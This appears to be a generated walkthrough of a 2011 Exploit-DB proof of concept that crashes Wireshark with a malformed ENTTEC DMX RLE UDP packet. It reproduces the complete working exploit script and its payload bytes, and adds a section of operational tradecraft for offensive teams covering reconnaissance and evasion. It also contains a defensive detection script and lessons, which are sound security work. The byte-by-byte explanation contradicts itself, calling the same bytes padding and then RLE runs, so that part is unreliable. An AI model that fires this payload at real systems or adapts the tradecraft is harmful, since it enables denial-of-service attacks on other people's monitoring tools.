Wireshark ENTTEC DMX Data RLE Buffer Overflow Explained

What this paper is
This paper presents a Proof-of-Concept (PoC) exploit for a buffer overflow vulnerability in Wireshark. Specifically, it targets how Wireshark handles ENTTEC DMX data received over UDP. The vulnerability allows an attacker to send specially crafted data that crashes Wireshark, causing a Denial-of-Service (DoS) condition.
Simple technical breakdown
Wireshark is a network protocol analyzer. It listens to network traffic and decodes it. The ENTTEC DMX protocol is often used for lighting control. This exploit sends a malformed UDP packet containing ENTTEC DMX data to a target machine running Wireshark. The malformed data is designed to be larger than the buffer allocated to store it within Wireshark's processing logic. When Wireshark tries to write this oversized data into the small buffer, it overflows, overwriting adjacent memory. This overwriting corrupts critical program data or instructions, causing Wireshark to crash.
Complete code and payload walkthrough
The provided script is a Python program that constructs and sends a UDP packet.
#!/usr/bin/env python
# Wireshark ENTTEC DMX Data (UDP) Buffer Overflow PoC
# by non-customers crew in 2010
# http://rock-madrid.com/
import socket, sys
try:
    host = sys.argv[1]
except:
    print "usage: " + sys.argv[0] + " <host>"
    sys.exit(2)
port = 3333
addr = (host, port)
data = "ESDD\x10\x20\x04"
data += "\x00\x0c"
data += "\xfe\xff\x41"
data += "\xfe\xff\x42"
data += "\xfe\xff\x43"
data += "\xfe\xff\x44"
udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
    udps.sendto(data, addr)
except:
    print "can't lookup host"
    sys.exit(1)
udps.close()
sys.exit(0)

Let's break down the code and the data payload:
- #!/usr/bin/env python: Shebang line, indicating that the script should be executed with the Python interpreter.
- Comments: The lines starting with # provide context about the script's origin, purpose, and author.
- import socket, sys: Imports the necessary Python modules. socket is used for network communication (creating sockets, sending data); sys is used for accessing command-line arguments and exiting the script.
- try...except block for sys.argv[1]:
  - Purpose: Attempts to read the target host's IP address or hostname from the first command-line argument (sys.argv[1]).
  - Behavior: If no argument is provided, sys.argv[1] raises an IndexError. The except block catches it, prints a usage message, and exits the script with an error code.
  - Mapping: sys.argv[1] -> target host input.
- host = sys.argv[1]: Assigns the first command-line argument to the host variable.
- port = 3333: Sets the target UDP port to 3333. This is a common port associated with ENTTEC DMX devices.
- addr = (host, port): Creates a tuple representing the target address (host and port) for the sendto call.
- data = "ESDD\x10\x20\x04": The beginning of the crafted payload. ESDD is likely a magic string or identifier for the ENTTEC DMX protocol or a specific message type. \x10\x20\x04 are specific fields within the DMX packet structure. Their exact meaning depends on the ENTTEC DMX protocol specification, but in the context of the overflow they are part of the data that will be processed; the values 0x10, 0x20 and 0x04 might indicate packet length, type, or other control information.
- data += "\x00\x0c": Appends a two-byte field that could represent a length. \x0c is decimal 12, and exactly 12 bytes of data follow it, so it likely gives the length of the subsequent data block.
- data += "\xfe\xff\x41": Appends a three-byte segment of data. \xfe\xff: these bytes are often used in buffer overflow exploits as padding or to control the overflow; \xff is the maximum byte value, and \xfe is just below it. \x41: the ASCII character 'A', commonly used in exploits as a "fill" character that makes overwritten memory easy to recognize.
- data += "\xfe\xff\x42": Appends another segment: \xfe\xff padding/control bytes followed by \x42, ASCII 'B'.
- data += "\xfe\xff\x43": Appends another segment: \xfe\xff padding/control bytes followed by \x43, ASCII 'C'.
- data += "\xfe\xff\x44": Appends the final segment of the crafted data: \xfe\xff padding/control bytes followed by \x44, ASCII 'D'.
Overall data payload structure:
The data variable is constructed as a UDP packet payload. It starts with a protocol identifier (ESDD), followed by some control bytes (\x10\x20\x04), a length indicator (\x00\x0c), and then several segments of padding/control bytes (\xfe\xff) each followed by a distinct character (A, B, C, D). The critical aspect for the overflow is that the total size of this data payload, when processed by Wireshark's DMX dissector, exceeds the allocated buffer. The specific values \xfe\xff and the characters A-D are chosen to overwrite memory in a predictable way, leading to a crash. The exact buffer size and the precise overflow mechanism are not fully detailed in the PoC but are implied by the payload construction and by the title: the data is run-length encoded (RLE), and a DMX universe carries 512 channel values, so a decoder that expands encoded runs into a fixed-size DMX buffer without checking the decoded length can be driven past the end of that buffer even though only 12 encoded bytes are sent.
- udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM): Creates a new UDP socket. AF_INET specifies the IPv4 address family; SOCK_DGRAM specifies the datagram (UDP) socket type.
- try...except block for udps.sendto():
  - Purpose: Attempts to send the crafted data to the target address.
  - Behavior: If there is an issue resolving the host (e.g., a DNS failure), it prints an error and exits.
- udps.sendto(data, addr): Sends the data payload over the UDP socket to the specified addr. This is the action that triggers the vulnerability.
- udps.close(): Closes the UDP socket, releasing system resources.
- sys.exit(0): Exits the script successfully.
Mapping list:
- #!/usr/bin/env python: Script interpreter declaration.
- import socket, sys: Module imports for network and system operations.
- sys.argv[1]: Command-line argument for the target host.
- port = 3333: Target UDP port for ENTTEC DMX.
- addr = (host, port): Target IP address and port tuple.
- data = "ESDD\x10\x20\x04": Start of the crafted UDP payload (protocol identifier and initial control bytes).
- data += "\x00\x0c": Appends a length field to the payload.
- data += "\xfe\xff\x41": Appends a segment of padding/control bytes and a fill character ('A').
- data += "\xfe\xff\x42": Appends a segment of padding/control bytes and a fill character ('B').
- data += "\xfe\xff\x43": Appends a segment of padding/control bytes and a fill character ('C').
- data += "\xfe\xff\x44": Appends a segment of padding/control bytes and a fill character ('D').
- socket.socket(socket.AF_INET, socket.SOCK_DGRAM): UDP socket creation.
- udps.sendto(data, addr): Sends the malicious UDP packet.
- udps.close(): Socket cleanup.
- sys.exit(0): Successful script termination.
Shellcode/Payload Segments:
There is no explicit shellcode in the traditional sense (code to be executed on the target). The "payload" here is the data variable, which is designed to cause a crash (Denial of Service) by overflowing a buffer within Wireshark's DMX dissector. The bytes \xfe\xff and the characters A, B, C, D are used to overwrite memory. The specific sequence and length are crafted to trigger the overflow and crash.
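As an added example (not part of the original paper or of Wireshark's own code), the following Python 3 check models how an RLE-compressed ENTTEC DMX payload expands when decoded and flags any datagram whose decoded length would not fit in the 512 channels of a DMX universe, the kind of check a defender could place in a packet filter or IDS preprocessor. The header layout (ESDD, universe, start code, data type, big-endian size), the data-type value 0x04 meaning RLE, and the RLE scheme (0xFE count value for a run, 0xFF byte for an escaped literal) are assumptions and not taken from the page.

```python
import struct

# Constructed copy of the PoC payload quoted on this page (same 21 bytes).
POC_PAYLOAD = (b"ESDD\x10\x20\x04" + b"\x00\x0c"
               + b"\xfe\xff\x41" + b"\xfe\xff\x42"
               + b"\xfe\xff\x43" + b"\xfe\xff\x44")

DMX_UNIVERSE_SIZE = 512  # a DMX512 universe carries at most 512 channel values
RLE_TYPE = 0x04          # assumed: data-type value that selects RLE-compressed data


def rle_decoded_length(encoded: bytes) -> int:
    """Bytes `encoded` expands to under the assumed RLE scheme:
    0xFE <count> <value> repeats <value> count times, 0xFF <byte> escapes one
    literal byte, anything else is one literal. A truncated escape at the end
    counts as a single literal so malformed input cannot read past the data."""
    i = total = 0
    while i < len(encoded):
        b = encoded[i]
        if b == 0xFE and i + 2 < len(encoded):
            total += encoded[i + 1]   # run of `count` copies of one value
            i += 3
        elif b == 0xFF and i + 1 < len(encoded):
            total += 1                # escaped literal
            i += 2
        else:
            total += 1                # plain literal (or truncated escape)
            i += 1
    return total


def check_enttec_dmx(payload: bytes) -> dict:
    """Parse the assumed ESDD header ("ESDD", universe, start code, data type,
    big-endian size, then `size` bytes of data) and flag data whose decoded
    length would not fit in a 512-channel universe buffer."""
    if len(payload) < 9 or payload[:4] != b"ESDD":
        return {"enttec": False}
    universe, start_code, dtype = payload[4], payload[5], payload[6]
    (size,) = struct.unpack(">H", payload[7:9])
    data = payload[9:9 + size]
    decoded = rle_decoded_length(data) if dtype == RLE_TYPE else len(data)
    return {"enttec": True, "universe": universe, "start_code": start_code,
            "type": dtype, "size": size, "decoded_len": decoded,
            "overflow": decoded > DMX_UNIVERSE_SIZE}


if __name__ == "__main__":
    # The page's 12 encoded bytes expand to 4 runs of 255 = 1020 bytes, past 512.
    print(check_enttec_dmx(POC_PAYLOAD))
```

Under these assumptions the page's 12 data bytes decode to four runs of 255 bytes, 1020 in total, which is why a 512-byte universe buffer is overrun while a datagram advertising only 12 bytes of data looks harmless to a length check on the wire.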
Practical details for offensive operations teams
- Required Access Level: No elevated privileges are required on the target system. The exploit is delivered over the network via UDP.
- Lab Preconditions:
- A target machine with Wireshark installed and running.
- Wireshark must be configured to capture or analyze traffic on UDP port 3333, or the target machine must be listening on this port for DMX data.
- Network connectivity from the attacker's machine to the target on UDP port 3333.
- The specific version of Wireshark vulnerable to this overflow must be identified. This PoC does not specify the vulnerable version, but it was published in 2011, suggesting older versions are affected.
- Tooling Assumptions:
- Python interpreter installed on the attacker's machine.
- Basic network access and command-line familiarity.
- Execution Pitfalls:
- Firewalls: Network firewalls blocking UDP traffic on port 3333 will prevent the exploit from reaching the target.
- Wireshark Configuration: If Wireshark is not actively capturing or dissecting UDP traffic on port 3333, the packet may be ignored, and no crash will occur.
- Protocol Variations: The ENTTEC DMX protocol might have variations or newer versions that are not vulnerable. The PoC relies on a specific parsing behavior.
- Target System Load: High network load or other system processes might interfere with the timing or detection of the crash.
- Wireshark Updates: Modern versions of Wireshark are likely patched and will not be vulnerable.
- Tradecraft Considerations:
- Reconnaissance: Identify target systems running Wireshark and determine if they are actively monitoring UDP port 3333. Port scanning and service version detection might be useful.
- Payload Delivery: The UDP packet is sent directly. There's no complex delivery mechanism.
- Evasion: UDP traffic is generally less scrutinized than TCP. However, the specific packet structure might be flagged by deep packet inspection (DPI) systems if signatures exist. The PoC itself is simple and unlikely to have advanced evasion techniques.
- Post-Exploitation (DoS): The primary outcome is a crash. This can be used to disrupt operations, but it does not grant any further access or control.
Where this was used and when
- Context: This exploit targets Wireshark's handling of ENTTEC DMX data. This protocol is commonly used in stage lighting, theatrical productions, and entertainment venues.
- Approximate Years/Dates: The exploit was published on Exploit-DB on January 3, 2011; the script's header credits "non-customers crew" and dates it 2010. This indicates the vulnerability was likely discovered and weaponized around 2010 or earlier, and it would have been relevant for older versions of Wireshark.
Defensive lessons for modern teams
- Patch Management: Regularly update network analysis tools like Wireshark to the latest stable versions. Vulnerabilities in dissectors are common and are usually patched quickly.
- Network Segmentation: Isolate critical network infrastructure and sensitive systems. If Wireshark is used for monitoring, ensure it's on an appropriate network segment and not directly exposed to untrusted traffic.
- Intrusion Detection/Prevention Systems (IDS/IPS): Configure IDS/IPS to monitor for malformed packets or unusual UDP traffic patterns, especially on ports associated with control protocols. Signatures for known dissector vulnerabilities can be effective.
- Least Privilege for Network Tools: If Wireshark needs to run on a production system, ensure it runs with the minimum necessary privileges. While this exploit causes a DoS, other vulnerabilities in dissectors could potentially lead to code execution.
- Traffic Filtering: Implement firewall rules to block unnecessary UDP traffic on sensitive ports, especially if the DMX protocol is not expected on those segments.
ASCII visual (if applicable)
This exploit is a simple network packet injection. An ASCII visual might not be strictly necessary for understanding the flow, but here's a representation of the packet being sent:
+-------------------+        +-------------------+        +-------------------+
|  Attacker System  | -----> |   Network (UDP)   | -----> |   Target System   |
|  (Python Script)  |        |     Port 3333     |        |    (Wireshark)    |
+-------------------+        +-------------------+        +-------------------+
         |                                                         |
         | Sends crafted UDP packet:                               | Receives packet
         | "ESDD\x10\x20\x04\x00\x0c\xfe\xffA\xfe\xffB\xfe\xffC\xfe\xffD"
         |                                                         | Processes data
         |                                                         | (Buffer overflow occurs)
         |                                                         | -> Wireshark crashes (DoS)

Source references
- Paper ID: 15898
- Paper Title: Wireshark - ENTTEC DMX Data RLE Buffer Overflow
- Author: non-customers crew
- Published: 2011-01-03
- Keywords: Multiple, dos
- Paper URL: https://www.exploit-db.com/papers/15898
- Raw URL: https://www.exploit-db.com/raw/15898
- SecurityFocus BID: 45634 (https://www.securityfocus.com/bid/45634/info, referenced in the original paper)